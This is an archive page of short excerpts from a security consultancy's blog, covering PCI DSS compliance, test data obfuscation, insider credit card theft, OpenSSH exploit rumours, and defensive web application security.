From the category archives:

Blog

Production Data in a Test Environment? Obfuscate or Generate

March 10, 2010

A recent article about database security and test use of production data in data processing QU environments reports on a poll of 80 large financial industry organizations that discovered “83 percent use real data, such as credit card or account numbers, when developing and testing applications.”
PCI DSS Section 6.3.4, IS27002:2005 section 12.4.2, COBIT 4.0 AI3.3 [...]

Read the full article →

Microsoft makes its four core SDL Training classes available to the public

March 1, 2010

Microsoft makes its four core SDL Training classes available to the public: Introduction to the Microsoft Security Development Lifecycle (SDL); Introduction to Microsoft Threat Modeling; Basics of Secure Design, Development, and Test; Privacy for Software Development.
You can download all the SDL materials and accompanying tools from the Microsoft site.
Tools are categorized by phase of the [...]

Read the full article →

PCI-DSS Compliance and Third Party Custom Application Vendors

August 22, 2009

We have been performing many interesting PCI DSS compliance projects, recently, assisting organizations in identifying their  security and compliance gaps, creating remediation project plans, and assisting  in communication with the acquiring bank that process their credit card transactions, often ghost-writing correspondence.
One of the most interesting things to come up recently has been the response from [...]

Read the full article →

Insider Threat: AMEX DBA steals Credit Card data

July 8, 2009

A DBA at American Express in Phoenix used his access to steal credit card numbers and PINs, encoded the card numbers onto blank cards, and used them to make purchases.
AMEX was hit by a long-standing database security management problem – how do you log the DBA’s activities, when the logs are stored in tables the [...]

Read the full article →

Rumors of new OpenSSH exploit in the wild, for older versions

July 8, 2009

http://www.theregister.co.uk/2009/07/08/openssh_exploit_rumour/
http://secer.org/hacktools/0day-openssh-remote-exploit.html
We first heard these rumors a couple days ago, but sat on it because there was no evidence at the time, and no one is served by the release of fake exploit reports.
The very latest versions of OpenSSH are apparently immune – this makes us think of a few posibilities:

Denial of Service condition from years [...]

Read the full article →

Cyber Warfare Trends for 2010: Network Attacks are the 21st Century’s Longbow

July 8, 2009

In the history or warfare, the ability to deliver powerful attacks from a distance has often been the deciding factors of conflicts. The prehistoric spear thrower  begat the javelin, spear, longbow, cannon, rifle, intercontinental ballistic missile, and most recently… the remote exploit.
Reuters reports:
SEOUL (Reuters) – South Korean authorities issued a cyber security warning on Wednesday [...]

Read the full article →

Poor Man’s Web Application Firewall (WAF) with Apache mod_rewrite

July 3, 2009

mod_rewrite can be used to protect against many types of XSS, XSRF, injection, HTTP verb abuse, referer link spam, image hijacking, and other things.
Here are a few articles with samples and examples of ways to use Apache mod_rewrite and .htaccess files to protect yourself.
http://perishablepress.com/press/2009/02/03/eight-ways-to-blacklist-with-apaches-mod_rewrite/
http://www.askapache.com/htaccess/mod_rewrite-tips-and-tricks.htm
http://www.askapache.com/htaccess/mod_rewrite-variables-cheatsheet.html
Of course there is always mod_security in addition to a range of [...]

Read the full article →

TorrentReactor Breach Used To Attack Users, Tip: How To Detect You’ve Been Hacked

July 3, 2009

In a nutshell – A recent trend in botnet/malware herder attacks is that are looking for new – and old – ways to accomplish the main purpose of including javascript malware on legitimate sites, often using traditional hacking methods.
Emphasis in the quote below is mine. Similar to the reports of FTP hacking recently, where attackers [...]

Read the full article →

Follow QuietMove on Twitter

July 2, 2009

We’re now posting the freshest, most relevant Information Security news to Twitter.
If you follow the “Security twit” hashtags #infosec, #security, #hack, #pci, #pcidss, and #webappsec, no doubt you’ve seen some of our posting.
Follow us, and we’ll follow you back!
http://twitter.com/quietmove

Read the full article →

Web App Security: Comparing and contrasting Black Box, White Box, Fault Injection, and SCA

June 13, 2007

This article is based on a talk I gave at the Phoenix OWASP chapter on May 10th.My intention is to summarize the methods used to assess the security of web applications, identify what they are good and not so good at finding, and outline their varying strengths and weaknesses. If you’ll indulge me, I’d [...]

Read the full article →

← Previous Entries